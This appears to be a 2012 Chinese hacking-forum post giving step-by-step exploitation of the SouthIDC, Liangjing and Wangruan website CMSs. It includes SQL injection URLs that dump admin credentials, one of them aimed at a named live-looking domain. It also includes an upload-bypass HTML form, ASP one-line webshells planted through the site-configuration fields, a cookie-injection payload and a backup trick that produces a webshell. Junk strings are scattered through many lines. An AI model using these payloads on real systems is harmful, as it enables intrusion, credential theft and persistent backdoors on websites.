找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2318|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb; z) m/ o' ?" u$ e  ?
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7   `7 e8 H- g- l0 S5 S2 c0 n
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F78 L! _# N1 C# F
直接暴管理员帐号密码(md5)
1 d% r& u8 A$ ~! m/ l2.登陆后台
' m- Z- A6 I. W3.利用编辑器上传:
( g" M7 A; H2 a8 E5 n( n访问admin/southidceditor/admin_style.asp4 D# a9 v# T0 y; k  A1 b
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.1 U. L  G& @, `
) f) ]1 V7 C$ I# V) V, y
========================================$ ~* S6 W/ j% B) w
. d1 D" r" ^3 \0 ^% Z" _
参考资料整理:7 t9 F0 k' g& i. f  R* K9 N
南方数据、良精系统、网软天下漏洞利用
* L' c" a6 e; R6 V% j; t0 X4 [0 Q5 E+ N& w% y$ V) C3 A
1、通过upfile_other.asp漏洞文件直接取SHELL
! E. Q8 B! W2 g2 U直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
. Z, Z+ y1 g% ]" U) k2 f<HTML><HEAD> " Q+ t. D- `7 W( L1 ?" l/ d! U- P' y
<META http-equiv=Content-Type content="text/html; charset=gb2312"> 9 W1 Y3 q, u# u, f) _" [* ^
<STYLE type=text/css>BODY { - @3 \6 m5 m# y( M7 s# {2 c
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee / f# P* c; j0 C& H0 d- J- Q0 Q
}
  l; U. c+ j- N0 J" S5 o8 @. g$ V.tx1 {
. \; w3 L6 _8 ?BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
( y1 i2 t+ }3 A  p} 2 o2 }0 ^( f/ U- V$ y% ?" `
</STYLE>' u/ N1 o& H9 R8 T0 d
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
/ v! E. R, c% m  ]. t1 C2 U$ @<BODY leftMargin=0 topMargin=0>   F$ P, c2 m" T/ a  O
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post 8 `6 |6 h0 w7 K7 \* c
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> $ _0 r6 Y$ _( P3 \3 @3 @
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
3 E" |% {  ]$ U4 P: Q0 U1 v  O( J' ^8 U( D9 P/ l/ k1 d
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。4 ]! @' s8 @1 u/ g
注:此方法通杀南方数据、良精系统、网软天下等
2 M% P6 s# [! @$ A
/ k1 J' K  U6 F' o  K7 T2、通过注入秒杀管理员帐号密码,使用如下:4 z8 F8 N: y) K+ e
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’, _1 u0 m7 ]4 O6 K2 Y& {
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
* B1 k$ W+ }- c* K5 Q在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
4 ]& S! |2 m! Q4 ~成功把shell写入http://www.target.com/inc/config.asp& f7 H; Q# ]& H; i) A) J  z$ Z
这里一句话chr(32)密码是“#”) |3 m; r) n* k! Q0 T9 r3 z
3、cookie注入
1 Z$ B, [1 d7 z. b/ P- e2 g清空地址栏,利用union语句来注入,提交:/ V% v/ b4 m3 d% z, {3 x& H9 B3 j
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
: w. G2 B; T) q; w9 v如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?: E% a' _: Z/ }) D1 R+ C6 m" q- c
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。
) E8 ^; X6 S7 r* Y7 `(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
- J2 E$ c' r% J% L/ d
) y/ D3 f( J& b' @& G0 j9 m三、后台取SHELL方法总结; i5 q4 {# _. X* s, t8 c
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:7 {! H# B' w: s
然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,, b0 g8 i% _, Y7 U8 t: B6 l8 Q& G
这时再打开一句话马的客户端,提交同样得到一个小马5 n! W! Q" k* L* d3 h2 u* j. l) y
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!); j3 A" \0 V% s% z3 ~( q
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:6 m7 Q4 h- e$ H
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
) C# ~/ T/ u6 n) Y# AEnableUpload=false
1 H& I. Z; E$ c6 b3 {. T& K) j2 M- O6 e, T3 C) g
end if , i8 w! V8 J* K4 ^, Q
if EnableUpload=false then
. U9 y  n2 {9 @' P6 C4 ~msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType% m3 E# q+ ^0 c( w" r4 e
FoundErr=true4 Q. D. L4 [3 n* u. q5 T2 D
end if/ Q; c( ?+ F" y: n: e# U: D
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:" Z* u! k! j9 i( W9 u
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)- _  {" U4 b+ e8 n: s0 g. Y6 n$ S
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的4 o% {8 P6 n6 F5 C! D
4 ]0 v, v" A+ c! h/ b; c5 Y
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的" m$ Y' L5 T; y- O
直接访问备份后的地址,就得到一个webshell4 p* H( e! C* `) b- T* w  \4 }7 M
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表